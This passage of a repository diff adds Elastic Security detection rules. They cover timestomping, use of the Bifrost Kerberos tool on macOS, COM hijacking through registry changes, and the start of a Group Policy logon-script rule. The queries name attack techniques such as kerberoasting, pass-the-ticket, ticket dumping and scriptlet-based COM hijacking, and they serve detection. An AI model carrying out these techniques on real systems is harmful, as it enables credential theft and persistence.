\"?:\\\\Windows\\\\system32\\\\svchost.exe\", \n \"?:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\app-*\\\\slack.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-*\\\\GitHubDesktop.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\") and \n not file.extension : (\"temp\", \"tmp\", \"~tmp\", \"xml\", \"newcfg\") and not user.name : (\"SYSTEM\", \"Local Service\", \"Network Service\") and\n not file.name : (\"LOG\", \"temp-index\", \"license.rtf\", \"iconcache_*.db\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "166727ab-6768-4e26-b80c-948b228ffc06", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "166727ab-6768-4e26-b80c-948b228ffc06_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json new file mode 100644 index 00000000000..07ded1d1dfc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of Bifrost, a known macOS Kerberos pentesting tool, which can be used to dump cached Kerberos tickets or attempt unauthorized authentication techniques such as pass-the-ticket/hash and kerberoasting.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Kerberos Attack via Bifrost", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.args:(\"-action\" and (\"-kerberoast\" or askhash or asktgs or asktgt or s4u or (\"-ticket\" and ptt) or (dump and (tickets or keytab))))\n", + "references": [ + "https://github.com/its-a-feature/bifrost" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "16904215-2c95-4ac8-bf5c-12354e047192", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.003", + "name": "Pass the Ticket", + "reference": "https://attack.mitre.org/techniques/T1550/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "16904215-2c95-4ac8-bf5c-12354e047192_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json new file mode 100644 index 00000000000..14a7139b3da --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json @@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and\n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\"\n ) and\n not \n (\n (\n process.name : \"svchost.exe\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Windows Publisher\" and\n registry.value : \"DelegateExecute\" and\n registry.data.strings : (\n /* https://strontic.github.io/xcyclopedia/library/clsid_4ED3A719-CEA8-4BD9-910D-E252F997AFC2.html */\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_A56A841F-E974-45C1-8001-7E3F8A085917.html */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78.html */\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\"\n )\n ) or\n (\n process.name : \"veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Veeam Software Group GmbH\"\n ) or \n (\n process.name : (\"ADNotificationManager.exe\", \"Creative Cloud.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Adobe Creative Cloud\\\\ACC\\\\Creative Cloud.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"IslandUpdateComRegisterShell64.exe\", \"IslandUpdate.exe\", \"GoogleUpdateComRegisterShell64.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\"Island Technology Inc.\", \"Google LLC\") and\n registry.data.strings : (\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Update\\\\*\",\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\"\n )\n ) or \n (\n process.name : (\"SelfService.exe\", \"WfShell.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Citrix Systems, Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\SelfServicePlugin\\\\SelfService.exe\\\" -ToastActivated\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\",\n \"%SystemRoot%\\\\sysWOW64\\\\shdocvw.dll\"\n )\n ) or \n (\n process.name : (\"msrdcw.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Corporation\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Apps\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"ssvagent.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Oracle America, Inc.\" and\n registry.data.strings : (\n \"?:\\\\Program Files\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\",\n \"?:\\\\Program Files (x86)\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\"\n )\n ) or \n (\n process.name : (\"hpnotifications.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"HP Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\hpsvcsscancomp.inf_amd64_*\\\\x64\\\\hpnotifications.exe\\\" -ToastActivated\"\n )\n )\n )\n )\n ) and\n\n /* removes false-positives generated by OneDrive and Teams */\n not\n (\n process.name: (\"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json new file mode 100644 index 00000000000..7a571e02abf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json @@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and\n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\"\n ) and\n not \n (\n (\n process.name : \"svchost.exe\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Windows Publisher\" and\n registry.value : \"DelegateExecute\" and\n registry.data.strings : (\n /* https://strontic.github.io/xcyclopedia/library/clsid_4ED3A719-CEA8-4BD9-910D-E252F997AFC2.html */\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_A56A841F-E974-45C1-8001-7E3F8A085917.html */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78.html */\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\"\n )\n ) or\n (\n process.name : \"veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Veeam Software Group GmbH\"\n ) or \n (\n process.name : (\"ADNotificationManager.exe\", \"Creative Cloud.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Adobe Creative Cloud\\\\ACC\\\\Creative Cloud.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"IslandUpdateComRegisterShell64.exe\", \"IslandUpdate.exe\", \"GoogleUpdateComRegisterShell64.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\"Island Technology Inc.\", \"Google LLC\") and\n registry.data.strings : (\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Update\\\\*\",\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\"\n )\n ) or \n (\n process.name : (\"SelfService.exe\", \"WfShell.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Citrix Systems, Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\SelfServicePlugin\\\\SelfService.exe\\\" -ToastActivated\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\",\n \"%SystemRoot%\\\\sysWOW64\\\\shdocvw.dll\"\n )\n ) or \n (\n process.name : (\"msrdcw.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Corporation\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Apps\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"ssvagent.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Oracle America, Inc.\" and\n registry.data.strings : (\n \"?:\\\\Program Files\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\",\n \"?:\\\\Program Files (x86)\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\"\n )\n ) or \n (\n process.name : (\"hpnotifications.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"HP Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\hpsvcsscancomp.inf_amd64_*\\\\x64\\\\hpnotifications.exe\\\" -ToastActivated\"\n )\n )\n )\n )\n ) and\n\n /* removes false-positives generated by OneDrive and Teams */\n not\n (\n process.name: (\"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json new file mode 100644 index 00000000000..b995eeb650f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.", + "false_positives": [ + "Legitimate Administrative Activity" + ], + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Startup/Logon Script added to Group Policy Object", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon 